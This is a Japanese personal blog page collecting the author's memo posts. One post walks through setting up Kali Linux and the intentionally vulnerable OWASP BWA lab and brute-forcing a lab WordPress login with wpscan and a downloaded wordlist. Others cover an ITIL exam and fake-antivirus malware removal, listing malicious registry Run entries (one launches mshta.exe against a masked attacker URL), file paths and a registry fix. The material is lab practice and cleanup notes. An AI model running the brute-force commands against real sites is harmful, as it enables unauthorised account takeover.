お仕事 一覧

【備忘録】ペネトレーションテストまがいの休日【KaliLinux】

どうも、毎度(笑)ご無沙汰してます、けーすけです。
今日は自分用の備忘録です。
加えまして、結構Webの先人の皆様のサイトを参考にさせていただきながらも躓いてしまった部分を記録しておきたいと思いまーす。

先日よりさんざん話題になってるwordpressの脆弱性の問題で、まあ、自分も色々いじってみようと思い、仮想環境を構築&いじる事にしましたー。
まずは何はなくとも仮想環境作らなくちゃいけないので、WMware Workstationをインストールしまーす。
自分の環境はWindows10 64bitなのでその通りにインストール。

続いて定番のKali Linuxのisoをダウンロードしまーす。
ここで問題発生。

2.9GM

ダウンロードに失敗しまくりwwwwwwwwwww
こんなんISDN時代以来やんwwwww
何度か頑張ってようやくダウンロード完了。
これを仮想環境にマウントしまーす。
こちらの手順は、以下のありがたいサイトさんを参考にさせていただきました。

Vmwareを使ってLinuxOS(Kali-Linux)を導入しよう

バージョンが違うので多少手順が異なってはいましたが、なんとかなりました。
まあ...そもそもVMwareを起動した時点で、
「バイナリ変換は、このプラットフォームでのロングモードには対応していません。ロングモードを無効にしています。ロングモードのサポートがないと、仮想マシンは64ビットコードを実行できません。詳細については、http://vmware.com/info?id=152 を参照してください。」
のエラーが出る事態になり、BIOSの「Intel Virtualication Technology」の初期値が「Disabled」になっていた事に気づき、実に久しぶりにBIOSの設定をなおすというあるあるもありました...。すみませんね、初心者で...。

さて、アコガレ?のKali Linuxを無事起動すると、きました~、中二病全開のこの画面wwwww
クリップボード2.png
うん、かっこいいですねw。

さて、起動したら今回はwordpressに攻撃を仕掛けるために作業してるので、OWASP BWAの環境をもう一個構築します。
ここでさりげなく躓きました。
参考にさせて頂いたのは、こちらのサイト様です。

VirtualBoxでわざと脆弱性を持たせたサーバの作り方 ~やられサイト構築~

こちらのサイト様ではOracleVM VirtualBoxを利用されていたので、環境の違いでやや戸惑いました。
それと...やっぱりOWASP Broken Web Applications Projectからのダウンロードが時間かかってちょっと折れたw
でもよく読んでいけばVMwareのソフトが違くても大丈夫です。

設定が終わって起動出来れば仮想脆弱性アプリのURLが出来るので、KaliLinuxの方からやりたい放題になります。
20170214_02.png
表示されたURLを使えばKali Linuxから各種脆弱性やりたい放題プレイが可能です。
ラインナップにつきましては、こちらのサイト様をご参照いただけると最高です。

OWASP BWA (The Broken Web Applications) とは?

ここまで出来たら手が後ろに回らない準備が出来ましたのでwwww
今日のところはBrute Forceで軽くテストします。
使うToolはwpscanです。
こちらに関しては、サイバーセキュリティ研究所様のWPscan入門を参考にさせていただきました。
コマンドラインの入力時に、"--"で始まるので少し注意が必要です。
こちらの解析ツールは、トータルの脆弱性診断をしてくれるのがスゴイっすね!(`ФωФ')

Brute Forceの前に、パスワードのリストをダウンロードします。
# wget http://download.openwall.net/pub/wordlists/all.gz
さくっと展開。
# gunzip all.gz
このファイル、ただのテキストなのに56.6MBもありますw

あとは簡単。
WPscanを起動して、
# wpscan --url http://***.***.**.***/
の実行で脆弱性の診断がサクっと出来る上に...ユーザアカウントもゲットできたりする事もあり。

アカウントがわかれば、以下のコマンドでBrute forceが実行できます。
# wpscan --url http://***.***.**.***/ --wordlist パスワードテキスト.txt --username アカウント

ちなみに今回の検証は2分かからなかったです。
bf_20170214.png今日はここまで。
本来のwordpressの脆弱性については次にでもつっつきます。

ではまたー(=゚ω゚)ノシ







【資格】ITIL Foundation V3 受けてきた【試験】

  • 更新日:
  • お仕事
  • ITIL
どもー、だいぶご無沙汰...というか、今年のアタマに会社変わってからご無沙汰してるうちに真夏も過ぎて鈴鹿1000kmも終わって、すっかり...台風連打の時期になったったwww

Twitterで日々つぶつぶしているので元気してるのは相変わらずだと思っていただいてるかと思いますんが、掲題の試験受けてたりしたので備忘録作っときます。

この記事に辿り着いてる方は既にこちらの試験をご存知だと思いますが、今回何を思いながら試験に臨んだかという事で...
1.0知識からスタート
2.短期決戦で決着する(結果的に2週間)
3.お金あんまりかけたくない(独学でいく)
4.当然一発で合格点をとる
ッス。



ご存知の通り、この試験...受験費用が26,000円。消費税やらなんやら込みで28,388円!
...これはもう一発で取るしかないでしょう。
会社が試験費用出してくれるとは言え、落ちたらかっこ悪い...ので、まあね、見得とかね(笑)。
各種講習を受講する機会がある方は、もちろんそちらの方が確実なのかなと思います。

さて、ということで自分はこれやりました、結果合格しました記述は以下の通り。

【1日目】
戦略会議(脳内)。
闇雲にやってもしょうがないから、あちこち調べまくって先人の知恵と努力を拝借。方針を立てる。予定通り行かないのが常。
結果は以下の戦略とする。
・本買う
 黄色本
・一通り読みきる(今回の誤算)
Ping-tの問題をやってやってやりまくって全部金にする
・試験当日ココロ穏やかに迎える
以上が今回の予定である。

【二日目以降】
Kindle版の黄色本購入。有難うAmazon。

読み始めるも、なんか単語覚えるのがいきなり出てきてアウトラインがうまくつかめず、早くも出鼻くじかれるモード。

困ったところで、白本を購入。

こっちのほうが実は読み進めやすかった、が、やっぱり黄色本の方が用語とか色々しっかりしてるので、ざっと白本読んでから改めて黄色本読んだ。
ここまでで結構忙しかった事もあり、一週間どころか10日経過してしまったよ。

気休めにいちょう葉サプリ飲む←アフォw


【試験二日前】
いきなり飛びます二日前w
Ping-t様の問題を20個ずつ順調に解いて一通り解く。
Ping-t様の問題のスバラシイところは、解説がむちゃくちゃ役に立つって事。
その問題だけじゃなくて、周囲の相関関係、流れ、全体像なんかもチェック出来るし、用語も見直せる。

【試験前日】
予め休みにしといたので、一日中解いて解いて解きまくって、全ての問題を金に。
何度も間違える箇所の解説は、自分でまとめてノートに記述。
試験直前にパラっと見直せるものを作っておく。

【試験当日】
自分は午前の方がアタマ動くので、11:30の回を予約済み。
あろうことか試験前にジムで運動しちゃったりとかしてね、それから糖分補給してGO。

結果:88%合格(65%が合格ライン)
ライフサイクルのところでちょっと間違えちゃったですが、合格ラインを上回れば良いのでよしとする。

【結論】
結論としては、白本不要で黄色本だけで行けるというのと、Ping-t様の問題がっちりおさえておけば大丈夫。という事でした。先人にならってほんとにこれだけでイケた。ただ、他でも記載の通り、問題の回答のまる覚えは厳禁。といったとこでしょうか。
かかった費用はKindle本2冊分。合計5,700円。

【苦労した点】
・受験生の中でも話題だけど、実際の試験で日本語が理解不能な文章がみられるwww
・誰でもだけど、勉強時間の確保

【余談】
ふー終わったー。
と思って昼ごはんに某所のサンドイッチ食べたら見事に当たったった\(^o^)/オワタ
冷汗かきながら帰宅⇒死亡コンボを決めた為、家人から「落ちたのか...」と夜起きるまで思われていた。起きたらケロリとしてウナギを食す。

最後に、Ping-t様、今回本当にお世話になりました。
有難う御座います!!!

【ウイルス】HTAファイルを利用したワンクリ詐欺サイト【備忘録】

皆様こんにちは、ボタンがあったら即押したい、海があったら釣りしたい、穴があったら入りたい、けーすけで、御座います。
如何お過ごしでしょうか。

久し振りにイイ生ログが採取出来たから備忘録。
昆虫採集の時期ですなぁ。

HijackThisのログに見事にエントリ出ますね。
不正なワンクリ詐欺のポップアップ出るケース。

O4 - HKCU\..\Run: [Skyae9564_5403404] "C:\WINDOWS\system32\mshta.exe" "http://****.movie109.info/dkbpl/GV0eaZ8l9jTPyeG3b8Pf5g.jsp"

HijackThisのスキャンで上記エントリをFix。mshta.exeのプロセスを停止して再起動で対応終了のようだ。
mshta.exeファイル自体は普通のMSの正規ファイルなのでファイルはそのまま。
なかなか見事だね、これ。

INTERNET Watch の情報サイト

【ウイルス】ウイルスの季節がまた来ましたな【備忘録】

皆様こんにちわ、昨夜は渋谷某所でネクタイ鉢巻して御満悦のけーすけで、御座います。
如何お過ごしでしょうか。

まぁ呑み喰い話は別として、毎年この時期ってコンピュータウイルスの活動が活発になり、激増。それを見て「あぁ・・・夏になったなぁ・・・」なーんて思うわけなんですけどね。
インチキウイルス対策ソフト系がまた活発だなぁ・・・・。
Security Tools とか。

C:\WINDOWS\Temp\_ex-08.exe
C:\documents and settings\【user】\Local Settings\Application Data\[ランダムな数字 ランダム桁].exe

あたりを削除して、スタートアップの確認と、"_ex-08.exe"の方はレジストリのRunにも書かれているから削除。
んでもComboFix一発で結構綺麗になるようだ。今のところは
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

加えて今日初めて遭遇したWindowsのちょっと驚いた件
コマンドプロンプトで ipconfig /all でMAC見ようとしたら通らず。あり?と思ってネットワーク接続から開こうとしたところ・・・・・・ネットワーク接続のフォルダが空っぽ・・・・はひ?
と思ったらMSのパッチ適用に関しての重大な問題で既出らしい
http://www.forest.impress.co.jp/article/2005/10/17/ms05051problems.html
http://support.microsoft.com/kb/909444/ja
うーん・・・実物初めて見た。

自分「ネットワーク接続のフォルダを開いて下さい」
相手「真っ白です」
自分「え・・・・・・・・・・」

俺様もアタマ真っ白(笑)。

【ウイルス】一瞬迷って今年もnorton先生

皆様こんにちわ、とりあえずasaさんに続け!な感じでNorton購入のけーすけで、御座います。
如何お過ごしでしょうか。

2010033023180000.jpg

ってなわけで今年もコレです。

ウイルス対策はよっぽど自信があるのでなければふつーに購入するのをオススメします(ウイルス騒動の現場から)。
今回USB版にしたので、愛用のPanasonic Let's note R3(ちと古いがな)にも面倒がらずにインストール出来るのが嬉しい限り。
半分中身はみ出たデスクトップPCにも早速インストール。
また一年宜しくお願いしまーっす。

【マルウェア】Vista Internet Security 2010【備忘録】

最近のインチキウイルス対策ソフトを装ったマルウェアはほんとに良く出来てる。
何故か日本語の解説ページが少なかったからメモ程度に備忘録。

掲題のウイルス対策ソフトを装ったマルウェア。
これまたしつっっこいくらいに出てくる。

プロセス名を確認すると、av.exe

タスクマネージャから停止するのは簡単だけど、すぐまた出てくる。
んでもって%UserProfile%AppData\Local\av.exe
を削除すると、.exe系や、フォルダオープンをすると関連付けを求められる・・・ってことは?

ってなわけで、

exefix.jpg

としてレジストリ修正ファイル作成(右クリック保存でファイルをどうぞ)。中身は以下の通り。

[-HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command]
[-HKEY_CURRENT_USER\Software\Classes\secfile\shell\open\command]
[-HKEY_CLASSES_ROOT\.exe\shell\open\command]

[HKEY_CLASSES_ROOT\.exe]
@="exefile"
"Content Type"="application/x-msdownload"

[-HKEY_CLASSES_ROOT\secfile]

実行すると改変されたレジストリが修正されるので、以下のファイルを削除
%UserProfile%\AppData\Local\av.exe
%UserProfile%\AppData\Local\6L0id5G
↑2行目のファイルはランダムに変更になるので適当に。

【マルウェア】今度はPC Live Guard【備忘録】

皆様こんにちわ、年明け仕事始め早々にまた面倒なものに遭遇したけーすけで、御座います。
いかがお過ごしでしょうか。

ほんとにね、身に覚えのないものはクリックしちゃぁいけません。
同意書は良く読んでからOKボタンを押下して下さいね。

*PC Live Guard*
Windows Security Centerモドキに見えるインチキセキュリティソフト。
当然ウイルス対策ソフトを無効化してくる。
色々小技が効いてて最近のヤツは出来が相当すごいわな。
改ざんされてるウェブサイトが結構あるみたいなので普段からセキュリティパッチの適用等注意しないとね・・・。

プログラムの追加と削除に出てこなかった。

FILE ::
C:\documents and settings\All Users\Application Data\117fc\573.mof
C:\documents and settings\All Users\Application Data\117fc\mozcrt19.dll
C:\documents and settings\All Users\Application Data\117fc\PC339.exe
C:\documents and settings\All Users\Application Data\117fc\PCLG.ico
C:\documents and settings\All Users\Application Data\117fc\PCLGSys\vd952342.bd
C:\documents and settings\All Users\Application Data\117fc\sqlite3.dll
C:\documents and settings\All Users\Application Data\PCYZDUHBELG\PCAWWLG.cfg
%UserProfile%s\Application Data\Microsoft\Internet Explorer\Quick Launch\PC Live Guard.lnk
%UserProfile%\Application Data\PC Live Guard\cookies.sqlite
%UserProfile%\Desktop\PC Live Guard.lnk
%UserProfile%\Recent\gid.tmp
%UserProfile%\Recent\SICKBOY.tmp
%UserProfile%\Recent\sld.drv
%UserProfile%\Start Menu\PC Live Guard.lnk
%UserProfile%\Start Menu\Programs\PC Live Guard.lnk
C:\documents and settings\All Users\Application Data\423d854\PC423d.exe
C:\documents and settings\All Users\Application Data\423d854\PCLG.ico
C:\documents and settings\All Users\Application Data\423d854\PCLGSys\vd952342.bd

FOLDER ::
C:\Documents and Settings\All Users\Application Data\117fc
C:\Documents and Settings\All Users\Application Data\117fc\PCLGSys
C:\Documents and Settings\All Users\Application Data\117fc\BackUp
C:\Documents and Settings\All Users\Application Data\117fc\Quarantine Items
C:\Documents and Settings\All Users\Application Data\PCYZDUHBELG
%UserProfile%\Application Data\PC Live Guard
C:\documents and settings\All Users\Application Data\423d854

そしたらウイルス対策ソフトのプロセスも起動するようになった。
けどレジストリに妙な具合に絡んでるみたいなんだけど情報があんまり無いなぁ・・・。

なにか違うのも居そうな・・・切り分けが出来ず

[参考サイト]
Remove PC Live Guard
How to Remove PC Live Guard
 

【ウイルス】_ex-08.exeの周辺【備忘録】

みなさんこんにちわ、急に寒くなってきたのに未だに服装が変わらないけーすけで、御座います。
いかがお過ごしでしょうか。
なんだかんだ言って寒いって程寒くはないような・・・。

備忘録ですが、_ex-08.exe対応中にいくつか忘れないうちにメモ。
当初
【ウイルス】もっともらしい偽セキュリティソフト
の記事で書いてた程甘くなかったわけで、

C:\WINDOWS\Temp\wpv[ランダムな数字].exe
C:\WINDOWS\Temp\_ex-08.exe

のほかに

C:\Documents and Settings\【user】\スタート メニュー\プログラム\スタートアップ\iidwin32.exe
C:\WINDOWS\System32\restorer32_a.exe

あたりもうろちょろしてるような・・・。
Trojan.Pandexの亜種みたいだけど
C:\WINDOWS\System32\restorer32_a.exe
コレは怪しいわな。場所が場所だし。

あ、あと
O4 - HKLM\..\Run: [ランダムな8桁数字] C:\DOCUME~1\ALLUSE~1\APPLIC~1\[ランダムな8桁数字]\[ランダムな8桁数字].exe
これって必ずしも作られるわけではないようだけど、どっからきてるんだろ・・・。

【ウイルス】もっともらしい偽セキュリティソフト

皆様こんにちわ、何気に夕べは王将の餃子お持ち帰りで晩御飯にしていたけーすけで、御座います。
いかがお過ごしでしょうか?

2日に1度の頻度で食べてるような・・・。
兄上が麻婆豆腐も買ってきてくれたので大満足で、アリマス
昨日仕掛作ってたらうっかり夜更かしして今朝はちと眠い(毎日11時までには寝る人)。

今日~のウイルス備忘録っていうかスパイウェア備忘録はちょっと久し振りにウェブ感染。
改変されたHPを見ただけで感染するヤツですわね。
エロサイトによく行く人だけでなく、危険はいっぱいありますねぇ・・・今回はごく普通のサイト。

HPのトップページを開くとダイヤログがポップアップ表示。

message.jpg

ん?なんじゃこりゃ、と思っているうちに、ふと見るとデスクトップと画面右下のタスクトレイに見慣れぬアイコンが作成されている。

icon.jpg

んでもってセキュリティの警告。

virus6.jpg

確認すると、
C:\WINDOWS\Temp\wpv[ランダムな数字].exe
C:\WINDOWS\Temp\_ex-08.exe
複数のランダムな.exeファイルが作成されており、このうちに任意の.exeがレジストリエントリに追記されてるみたい。
msconfigからスタートアップを見ても簡単に判別可能。
たぶんexeが先でその後偽のセキュリティツールをダウンロード・インストールしたのかなぁ。
インストール場所は別フォルダになります。
感染後にコマンドプロンプトからnetstatで確認すると、怪しげな通信を続けているのでこれはなかなか・・・

もっともらしくスキャンを開始してもっともらしく嘘の感染情報を表示。
Removeする為のボタンを押すと料金請求画面に推移する仕組みになっている。
VISAカードとかが使用可能みたいよ(笑)。
おひとつ、どお?


[メモ]
Downloader.MisleadApp
Packed.Generic.264
Trojan.Horse
W32.Waledac

【ウイルス】Windows Enterprise Defender

みなさんこんばんわ、昨夜の飲み会の後に渋谷某店へ乱入した記憶が綺麗さっぱりロストしたけーすけで、御座います。
如何お過ごしでしょうか?

先程乱入劇の顛末を現地調査し、記憶の補完を無事はたしてまいった次第で御座います。
M本しゃっちょーにはいつもいつもお世話になり、足を向けては眠れません。
もちろんS田さん・とみちゃんにもいつも御迷惑をお掛けし、有り難くおもっちょります。

今日はまた昼飯で渋谷区役所の社食に行ってきた。

2009101612130000.jpg

渋谷区役所食堂に入っているターリー屋のカレーセットでございまーす。
この巨大なナンを1枚1枚インド人(と思われる)のスタッフさんが設置されてるカマで焼いてくれる焼き立てホヤッホヤ!!
ナンだけでもほんっっとにうっまーい!!!
実はナンにつぶされて見えませんが、この下に小盛りのターメリックライスと玉子焼きがささやかに隠れてます。

結局食べきれませんでしたが・・・・・・
 


今日の備忘録:

ウイルスではありませんけど、スパイウェア。
チュニジアだったかなぁ・・・のホームページ出入りしてたらどうもインストールされちゃったみたいなインチキアンチウイルスソフト。
その名も【Windows Enterprise Defender】(大爆笑)
セーフモードでも起動して常駐しますが、プログラムの追加と削除に出てこないのでちとやっかいかな。
消すのは簡単。
HijackThisのログにもエントリーしてきますんでそのままFix可能。
以下の通り

O4 - HKLM\..\Run: [Windows Enterprise Defender] "C:\Documents and Settings\All Users\Application Data\ca6c8ab\WEca6c.exe" /s /d

んでもってご覧の通り

c:\documents and settings\All Users\Application Data\ca6c8ab
c:\documents and settings\All Users\Application Data\ca6c8ab\22.mof
c:\documents and settings\All Users\Application Data\ca6c8ab\WEca6c.exe
c:\documents and settings\All Users\Application Data\ca6c8ab\WED.ico
c:\documents and settings\All Users\Application Data\ca6c8ab\WEDDSys\
vd952342.bd
c:\documents and settings\All Users\Application Data\Microsoft\Network\
Downloader\qmgr0.dat
c:\documents and settings\All Users\Application Data\Microsoft\Network\
Downloader\qmgr1.dat
c:\documents and settings\【user】\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Enterprise Defender.lnk
c:\documents and settings\【user】\Application Data\Windows Enterprise Defender
c:\documents and settings\【user】\Application Data\Windows Enterprise Defender\Instructions.ini
c:\documents and settings\【user】\スタート メニュー\Windows Enterprise Defender.lnk

Symantecのサービスが停止されてしまってセーフモードでもフルスキャンが実行出来ない状態。
Hostsがボロボロにやられてたのはどの影響なのか。。。

このページの上部へ

About

脱HTMLの為にちまちま手動で作った管理人けーすけの試行錯誤ブログ。
愛車スカイライン&コペンと温泉と酒と烏賊釣り触手吸盤プレイの日々…破廉恥下ネタアリのfor Adult仕様
ようやくスマホ向けページが出来たよヽ(`Д´)ノウワァァァン!!

プロフィール

HN:けーすけ
愛車HR34と温泉と釣りとお酒をこよなく愛する3●歳
Twitterアカウントは@keisuke_remixで。

サイト内検索

最近のコメント

最近のピクチャ

  • クリップボード2.png
  • DSC_0156_2.JPG
  • DSC_1174.JPG
  • Screenshot_2015-12.png
  • DSC_1165.JPG
  • DSC_1161.JPG
  • DSC_0419.JPG
  • DSC_0394.JPG
累計
本日人  昨日

Powered by Movable Type 5.161-ja